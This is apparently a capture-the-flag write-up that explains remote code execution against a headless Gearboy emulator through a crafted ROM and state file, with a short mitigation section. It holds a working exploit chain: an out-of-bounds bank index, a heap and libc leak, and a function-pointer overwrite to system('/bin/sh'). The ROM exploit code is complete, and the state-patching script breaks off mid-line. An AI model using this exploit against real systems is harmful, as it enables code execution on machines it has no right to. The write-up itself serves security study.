--- documentclass: extarticle geometry: margin=2cm title: Gearboy Writeup author: sinitax fontsize: 12pt --- ## Exploit The task is to gain remote code execution (atleast to the point of reading the contents of the flag file) by manipulating only a gameboy rom and state file which will be run on the server using a modified, headless version of [*Gearboy*](https://github.com/drhelius/Gearboy), a gameboy emulator. My immediate suspicions were with missing checks for the state file and not the ROM, because the state can be saved at any time and its generally easier to forget checks before every use instead of once upon loading the ROM. By inspecting the source code for `GearboyCore::LoadState` we find the functionality for the emulator split into many different classes and a LoadState for each, e.g. `Processor::LoadState` and `Memory::LoadState`. `Memory::LoadState` loads among other things various memory bank buffers as well as values which control which of those banks are selected. Since the address space of the gameboy is limited (16-bit address space), parts of the memory must be swapped out to facilitate access to larger amounts. Often times and index is used to indicate which memory bank is in use, as is the case with `WRAM1`: ``` u8* Memory::GetWRAM1() { return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000; } ``` As long as `m_bCGB` (a flag enabling gameboy color mode) is set, the backing buffer of `WRAM1` will be chosen from a bank in `m_pWRAMBanks`. The value of `m_bCGB` is controlled by special purpose bytes in the ROM which we can control. Since `m_iCurrentWRAMBank` is loaded as part of the state and its value is not properly sanitized, modifying this value in the state file allows us to essentially mmap an arbitrary piece of memory into the address space of our emulated game. When the running ROM writes and reads to `0xD000-0xE000`, it will instead access the address we control. But where to write when ASLR's enabled? To get around ASLR we need to find objects on the heap with consistent offsets to the `WRAM` bank buffer `m_pWRAMBanks`. We can do this by running `gdbserver` in the docker container and observing the surrounding memory and pointers of objects allocated closely before or after. The fact that each session is a freshly spawned docker container helps with consistency. Doing this we find a heap configuration which is consistent on every first run in the docker container: the address of the `Processor` object is at an offset of `-0x126a0` from `m_pWRAMBanks` and the `Memory` object is at an offset of `-0xd0` from the `Processor` object. By setting the `m_iCurrentWRAMBank` value to `-0x13` in the state file we will be able to access the `Processor` object at `0x13000-0x126a0+0xD000=0xD960` and the `Memory` object at `0x13000-0x125d0+0xD000=0xD890`. For every instruction, the processor resolves the function for handling an opcode by looking it up in a table using the opcode as an index. This `opcodeTable` is a member of the `Processor` object and as such stored on the heap. By reading one of these function pointers and subtracting its offset in the binary we can recover the base address at which the gearboy emulator is loaded. Now that we know the base address and as a result the address of the GOT, regularly the next natural step is to leak libc by reading the got, calculate the address of system and overwrite a function pointer to call system. The only problem is, we are still just a ROM in an emulator and only have access to the memory mapped into `0xD000-0xE000`. We need to look for another access primitive. This time, however, we are not limited to our state and rom file contents. We can manipulate the `Memory` and `Processor` objects directly! Looking through the source code again we find a good candidate: ``` u8* Memory::GetVRAM() { if (m_bCGB) return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000; else return m_pMap + 0x8000; } ``` We have already set `m_bCGB` and `m_iCurrentLCDRAMBank` is loaded from the state file. As such, we can make access to `0x8000-0x9000` backed by the `m_pLCDRAMBank1` buffer, whose pointer we control. We set `m_pLCDRAMBank1` in the `Memory` object to point to the target got address of `free` which is calculated using the base address. We can then read the `free` address from `0x8000`, leak the libc base and calculate the `system` address. To finally call system, we overwrite a function pointer in `Processor::opcodeTable` and call the corresponding opcode. We ensure the first argument to `system` points to the string **/bin/sh** by writing it to the address of the `Processor` object, as this is the address in `rdi` when `system` is called. Since `opcodeTable` is the first member in `Processor` we need to choose an opcode to call which does not conflict with the space used for the string and also is not called before the value can be fully written (as is the case with the load instructions). The `stop` instruction (value `0x10`) is a good fit here. ### Mitigation This attack can be mitigated by performing better input sanitization when loading values from the state file. This would have prevented the initial read / write out-of-bounds and as such the subsequent RCE. This can be implemented for `m_iCurrentWRAMBank` as a simple range check. \newpage **ROM Code (compiled using GBDK):**\footnote{https://github.com/gbdk-2020/gbdk-2020/} ```C #include "stdint.h" #include "string.h" void main(void) { volatile static uint8_t *processor_gb; volatile static uint8_t *memory_gb; volatile static uint8_t *free_got_gb; volatile static uint64_t op0x00; volatile static uint64_t base; volatile static uint64_t libc; volatile static uint64_t free_got; volatile static uint64_t target; /* WRAM BANK = -0x13 */ processor_gb = (void*) 0xD960; memory_gb = processor_gb - 0xd0; /* get base from op0x00 */ op0x00 = *(uint64_t*)processor_gb; base = op0x00 - 0x1d420; free_got = base + 0x4ad78; /* change lcdrambank pointer to access got */ *(uint64_t*)(memory_gb+0x90) = free_got; free_got_gb = (void*) 0x8000; libc = (*(uint64_t*)free_got_gb) - 0x9a6d0; target = libc + 0x52290; strcpy((char*)processor_gb, "/bin/sh"); *(uint64_t*)(processor_gb+0x10*0x10) = target; __asm \ stop \ __endasm; while (1); } ``` \newpage **Upload and state modification script:** ```python from base64 import b64encode from sys import argv,exit from pwn import * rom = list(open("main.gb", "rb").read()) state = list(open("main.state", "rb").read()) # set m_iCurrentWRAMBank for i,v in enumerate(struct.pack("